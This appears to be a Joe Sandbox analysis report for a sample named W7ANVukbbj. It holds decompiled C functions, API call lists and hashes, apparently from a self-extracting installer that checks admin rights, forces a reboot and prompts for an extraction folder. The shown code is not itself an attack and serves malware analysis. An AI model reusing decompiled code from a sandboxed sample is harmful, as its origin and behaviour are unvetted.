                                                                                                                                                                                                            • Part of subcall function 008617EE: AllocateAndInitializeSid.ADVAPI32(008618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008618DD), ref: 00861855
                                                                                                                                                                                                            • Part of subcall function 008617EE: FreeSid.ADVAPI32(?,?,?,?,008618DD), ref: 00861883
                                                                                                                                                                                                            • Part of subcall function 008617EE: FreeLibrary.KERNEL32(00000000,?,?,?,008618DD), ref: 0086188A
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 008618EB
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 008618F2
                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0086190A
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00861918
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,?,?), ref: 0086192C
                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00861944
                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00861964
                                                                                                                                                                                                          • EqualSid.ADVAPI32(00000004,?), ref: 0086197A
                                                                                                                                                                                                          • FreeSid.ADVAPI32(?), ref: 0086199C
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 008619A3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 008619AD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2168512254-0
                                                                                                                                                                                                          • Opcode ID: 3831d014ddd9635308b88dfc84cd14b2805a511e421fc67e9e0d1dcbe44bf55e
                                                                                                                                                                                                          • Instruction ID: bfb9a09399ba0e53a106b320a3f9f819a8b227cef5e80c519e1483168c89c423
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3831d014ddd9635308b88dfc84cd14b2805a511e421fc67e9e0d1dcbe44bf55e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A314A71A00209EFDF209FA5DC99AAFBFBCFF04304F561429E645E2161EB719905CB62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                                          			E00861F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                          				signed char _t30;
                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t41 = __esi;
                                                                                                                                                                                                          				_t38 = __edi;
                                                                                                                                                                                                          				_t30 = __ecx;
                                                                                                                                                                                                          				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          						if( *0x869a40 != 0) {
                                                                                                                                                                                                          							_pop(_t30);
                                                                                                                                                                                                          							_t44 = _t46;
                                                                                                                                                                                                          							_t13 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                          							_push(_t38);
                                                                                                                                                                                                          							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                          								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                          								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                          								_v12 = 2;
                                                                                                                                                                                                          								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                          								CloseHandle(_v28);
                                                                                                                                                                                                          								_t41 = _t41;
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								if(_t21 != 0) {
                                                                                                                                                                                                          									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                          										_t25 = 1;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t37 = 0x4f7;
                                                                                                                                                                                                          										goto L3;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t37 = 0x4f6;
                                                                                                                                                                                                          									goto L4;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t37 = 0x4f5;
                                                                                                                                                                                                          								L3:
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								L4:
                                                                                                                                                                                                          								_push(0x10);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								E008644B9(0, _t37);
                                                                                                                                                                                                          								_t25 = 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_pop(_t40);
                                                                                                                                                                                                          							return E00866CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t37 = 0x522;
                                                                                                                                                                                                          						_t28 = E008644B9(0, 0x522, 0x861140, 0, 0x40, 4);
                                                                                                                                                                                                          						if(_t28 != 6) {
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					__eax = E00861EA7(__ecx);
                                                                                                                                                                                                          					if(__eax != 2) {
                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                          						return _t28;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}

















                                                                                                                                                                                                          0x00861f90
                                                                                                                                                                                                          0x00861f90
                                                                                                                                                                                                          0x00861f93
                                                                                                                                                                                                          0x00861f98
                                                                                                                                                                                                          0x00861fa4
                                                                                                                                                                                                          0x00861fa7
                                                                                                                                                                                                          0x00861fc5
                                                                                                                                                                                                          0x00861fcd
                                                                                                                                                                                                          0x00861fdb
                                                                                                                                                                                                          0x00861ee5
                                                                                                                                                                                                          0x00861eea
                                                                                                                                                                                                          0x00861ef1
                                                                                                                                                                                                          0x00861ef4
                                                                                                                                                                                                          0x00861f0c
                                                                                                                                                                                                          0x00861f2e
                                                                                                                                                                                                          0x00861f3a
                                                                                                                                                                                                          0x00861f46
                                                                                                                                                                                                          0x00861f4d
                                                                                                                                                                                                          0x00861f58
                                                                                                                                                                                                          0x00861f60
                                                                                                                                                                                                          0x00861f61
                                                                                                                                                                                                          0x00861f62
                                                                                                                                                                                                          0x00861f75
                                                                                                                                                                                                          0x00861f80
                                                                                                                                                                                                          0x00861f77
                                                                                                                                                                                                          0x00861f77
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861f77
                                                                                                                                                                                                          0x00861f64
                                                                                                                                                                                                          0x00861f64
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861f64
                                                                                                                                                                                                          0x00861f0e
                                                                                                                                                                                                          0x00861f0e
                                                                                                                                                                                                          0x00861f13
                                                                                                                                                                                                          0x00861f13
                                                                                                                                                                                                          0x00861f14
                                                                                                                                                                                                          0x00861f14
                                                                                                                                                                                                          0x00861f16
                                                                                                                                                                                                          0x00861f17
                                                                                                                                                                                                          0x00861f1a
                                                                                                                                                                                                          0x00861f1f
                                                                                                                                                                                                          0x00861f1f
                                                                                                                                                                                                          0x00861f86
                                                                                                                                                                                                          0x00861f8f
                                                                                                                                                                                                          0x00861fcf
                                                                                                                                                                                                          0x00861fd3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861fd3
                                                                                                                                                                                                          0x00861fa9
                                                                                                                                                                                                          0x00861fb4
                                                                                                                                                                                                          0x00861fbb
                                                                                                                                                                                                          0x00861fc3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861fc3
                                                                                                                                                                                                          0x00861f9a
                                                                                                                                                                                                          0x00861f9a
                                                                                                                                                                                                          0x00861fa2
                                                                                                                                                                                                          0x00861fd9
                                                                                                                                                                                                          0x00861fda
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861fa2

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00861EFB
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00861F02
                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00861FD3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                                                          • API String ID: 2795981589-3733053543
                                                                                                                                                                                                          • Opcode ID: 0be5f414c2daa4b7aad01b7502c19cfe67b77939c09cc001c5ae68923b1aecdf
                                                                                                                                                                                                          • Instruction ID: 5a48f666cce1e957b9155409394e6247254557998bb1054e33b8c3debd196b23
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0be5f414c2daa4b7aad01b7502c19cfe67b77939c09cc001c5ae68923b1aecdf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E721F971B40205BBDF209BA59C4EFBF76B8FB85B10F161018FA02E6182DF7588019662
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00867155() {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				struct _FILETIME _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                          				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                          				_t23 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                          					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                          					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                          					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                          					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                          					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                          					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                          					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                          					_t39 = _t36;
                                                                                                                                                                                                          					if(_t36 == 0xbb40e64e || ( *0x868004 & 0xffff0000) == 0) {
                                                                                                                                                                                                          						_t36 = 0xbb40e64f;
                                                                                                                                                                                                          						_t39 = 0xbb40e64f;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x868004 = _t39;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t37 =  !_t36;
                                                                                                                                                                                                          				 *0x868008 = _t37;
                                                                                                                                                                                                          				return _t37;
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          0x0086715d
                                                                                                                                                                                                          0x00867161
                                                                                                                                                                                                          0x00867165
                                                                                                                                                                                                          0x00867178
                                                                                                                                                                                                          0x00867182
                                                                                                                                                                                                          0x0086718e
                                                                                                                                                                                                          0x00867197
                                                                                                                                                                                                          0x008671a0
                                                                                                                                                                                                          0x008671b1
                                                                                                                                                                                                          0x008671b8
                                                                                                                                                                                                          0x008671c4
                                                                                                                                                                                                          0x008671c7
                                                                                                                                                                                                          0x008671cb
                                                                                                                                                                                                          0x008671d5
                                                                                                                                                                                                          0x008671da
                                                                                                                                                                                                          0x008671da
                                                                                                                                                                                                          0x008671dc
                                                                                                                                                                                                          0x008671dc
                                                                                                                                                                                                          0x008671e2
                                                                                                                                                                                                          0x008671e5
                                                                                                                                                                                                          0x008671ee

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00867182
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00867191
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0086719A
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 008671A3
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 008671B8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1445889803-0
                                                                                                                                                                                                          • Opcode ID: 300c7f33a6fb21ee764bfdc464e9c19284375df29d3cac951bc61bce44204d5d
                                                                                                                                                                                                          • Instruction ID: 291dadb60f799540f9ce16a1dc3d1bb42484bd1cf9e126e33ced7bc1955bc1c6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 300c7f33a6fb21ee764bfdc464e9c19284375df29d3cac951bc61bce44204d5d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58114871D01608EFCB14DFB8DA48A9EB7F8FF19314F625966E806E7210EA709A048F41
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00866CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                          				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                          			}



                                                                                                                                                                                                          0x00866cf7
                                                                                                                                                                                                          0x00866d00
                                                                                                                                                                                                          0x00866d19

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00866E26,00861000), ref: 00866CF7
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00866E26,?,00866E26,00861000), ref: 00866D00
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,00866E26,00861000), ref: 00866D0B
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00866E26,00861000), ref: 00866D12
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                          • Opcode ID: 6ca2fbdcf6f03ef026a04d05434f4fdfd87b929ab20558461e6ea2b91e6c6386
                                                                                                                                                                                                          • Instruction ID: 85cd3eb6e65a623585eb29780365c8f13072c33899e078f0c4f474fbed733776
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ca2fbdcf6f03ef026a04d05434f4fdfd87b929ab20558461e6ea2b91e6c6386
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D01232000108BBDB042BF1EC0CA593F28FB4A312F466000F31FA6020CBB29451CF53
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                          			E00863210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          				int _t20;
                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                          				int _t23;
                                                                                                                                                                                                          				char _t24;
                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                          				int _t27;
                                                                                                                                                                                                          				int _t30;
                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                          				CHAR* _t49;
                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                          				struct HWND__* _t64;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t64 = _a4;
                                                                                                                                                                                                          				_t6 = _a8 - 0x10;
                                                                                                                                                                                                          				if(_t6 == 0) {
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                          					EndDialog(_t64, ??);
                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                          					__eflags = 1;
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t42 = 1;
                                                                                                                                                                                                          				_t10 = _t6 - 0x100;
                                                                                                                                                                                                          				if(_t10 == 0) {
                                                                                                                                                                                                          					E008643D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                          					SetWindowTextA(_t64, "herso");
                                                                                                                                                                                                          					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                          					__eflags =  *0x869a40 - _t42; // 0x3
                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                          						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L36:
                                                                                                                                                                                                          					return _t42;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t10 == _t42) {
                                                                                                                                                                                                          					_t20 = _a12 - 1;
                                                                                                                                                                                                          					__eflags = _t20;
                                                                                                                                                                                                          					if(_t20 == 0) {
                                                                                                                                                                                                          						_t21 = GetDlgItemTextA(_t64, 0x835, 0x8691e4, 0x104);
                                                                                                                                                                                                          						__eflags = _t21;
                                                                                                                                                                                                          						if(_t21 == 0) {
                                                                                                                                                                                                          							L32:
                                                                                                                                                                                                          							_t58 = 0x4bf;
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0x10);
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							L25:
                                                                                                                                                                                                          							E008644B9(_t64, _t58);
                                                                                                                                                                                                          							goto L39;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t49 = 0x8691e4;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t23 =  *_t49;
                                                                                                                                                                                                          							_t49 =  &(_t49[1]);
                                                                                                                                                                                                          							__eflags = _t23;
                                                                                                                                                                                                          						} while (_t23 != 0);
                                                                                                                                                                                                          						__eflags = _t49 - 0x8691e5 - 3;
                                                                                                                                                                                                          						if(_t49 - 0x8691e5 < 3) {
                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t24 =  *0x8691e5; // 0x3a
                                                                                                                                                                                                          						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                          						if(_t24 == 0x3a) {
                                                                                                                                                                                                          							L21:
                                                                                                                                                                                                          							_t25 = GetFileAttributesA(0x8691e4);
                                                                                                                                                                                                          							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                          							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                          								L26:
                                                                                                                                                                                                          								E0086658A(0x8691e4, 0x104, 0x861140);
                                                                                                                                                                                                          								_t27 = E008658C8(0x8691e4);
                                                                                                                                                                                                          								__eflags = _t27;
                                                                                                                                                                                                          								if(_t27 != 0) {
                                                                                                                                                                                                          									__eflags =  *0x8691e4 - 0x5c;
                                                                                                                                                                                                          									if( *0x8691e4 != 0x5c) {
                                                                                                                                                                                                          										L30:
                                                                                                                                                                                                          										_t30 = E0086597D(0x8691e4, 1, _t64, 1);
                                                                                                                                                                                                          										__eflags = _t30;
                                                                                                                                                                                                          										if(_t30 == 0) {
                                                                                                                                                                                                          											L35:
                                                                                                                                                                                                          											_t42 = 1;
                                                                                                                                                                                                          											__eflags = 1;
                                                                                                                                                                                                          											goto L36;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										L31:
                                                                                                                                                                                                          										_t42 = 1;
                                                                                                                                                                                                          										EndDialog(_t64, 1);
                                                                                                                                                                                                          										goto L36;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags =  *0x8691e5 - 0x5c;
                                                                                                                                                                                                          									if( *0x8691e5 == 0x5c) {
                                                                                                                                                                                                          										goto L31;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L30;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_push(0x10);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_t58 = 0x4be;
                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t32 = E008644B9(_t64, 0x54a, 0x8691e4, 0, 0x20, 4);
                                                                                                                                                                                                          							__eflags = _t32 - 6;
                                                                                                                                                                                                          							if(_t32 != 6) {
                                                                                                                                                                                                          								goto L35;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t33 = CreateDirectoryA(0x8691e4, 0);
                                                                                                                                                                                                          							__eflags = _t33;
                                                                                                                                                                                                          							if(_t33 != 0) {
                                                                                                                                                                                                          								goto L26;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0x10);
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0x8691e4);
                                                                                                                                                                                                          							_t58 = 0x4cb;
                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags =  *0x8691e4 - 0x5c;
                                                                                                                                                                                                          						if( *0x8691e4 != 0x5c) {
                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                          						if(_t24 != 0x5c) {
                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t34 = _t20 - 1;
                                                                                                                                                                                                          					__eflags = _t34;
                                                                                                                                                                                                          					if(_t34 == 0) {
                                                                                                                                                                                                          						EndDialog(_t64, 0);
                                                                                                                                                                                                          						 *0x869124 = 0x800704c7;
                                                                                                                                                                                                          						goto L39;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t34 != 0x834;
                                                                                                                                                                                                          					if(_t34 != 0x834) {
                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t37 = LoadStringA( *0x869a3c, 0x3e8, 0x868598, 0x200);
                                                                                                                                                                                                          					__eflags = _t37;
                                                                                                                                                                                                          					if(_t37 != 0) {
                                                                                                                                                                                                          						_t38 = E00864224(_t64, _t46, _t46);
                                                                                                                                                                                                          						__eflags = _t38;
                                                                                                                                                                                                          						if(_t38 == 0) {
                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t39 = SetDlgItemTextA(_t64, 0x835, 0x8687a0);
                                                                                                                                                                                                          						__eflags = _t39;
                                                                                                                                                                                                          						if(_t39 != 0) {
                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t63 = 0x4c0;
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						E008644B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						goto L38;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t63 = 0x4b1;
                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}

























                                                                                                                                                                                                          0x0086321b
                                                                                                                                                                                                          0x0086321e
                                                                                                                                                                                                          0x00863221
                                                                                                                                                                                                          0x0086343c
                                                                                                                                                                                                          0x0086343e
                                                                                                                                                                                                          0x0086343f
                                                                                                                                                                                                          0x00863445
                                                                                                                                                                                                          0x00863447
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863447
                                                                                                                                                                                                          0x00863229
                                                                                                                                                                                                          0x0086322a
                                                                                                                                                                                                          0x0086322f
                                                                                                                                                                                                          0x008633ec
                                                                                                                                                                                                          0x008633f7
                                                                                                                                                                                                          0x00863410
                                                                                                                                                                                                          0x00863416
                                                                                                                                                                                                          0x0086341d
                                                                                                                                                                                                          0x0086342d
                                                                                                                                                                                                          0x0086342d
                                                                                                                                                                                                          0x00863438
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863438
                                                                                                                                                                                                          0x00863237
                                                                                                                                                                                                          0x00863243
                                                                                                                                                                                                          0x00863243
                                                                                                                                                                                                          0x00863246
                                                                                                                                                                                                          0x008632ee
                                                                                                                                                                                                          0x008632f4
                                                                                                                                                                                                          0x008632f6
                                                                                                                                                                                                          0x008633d4
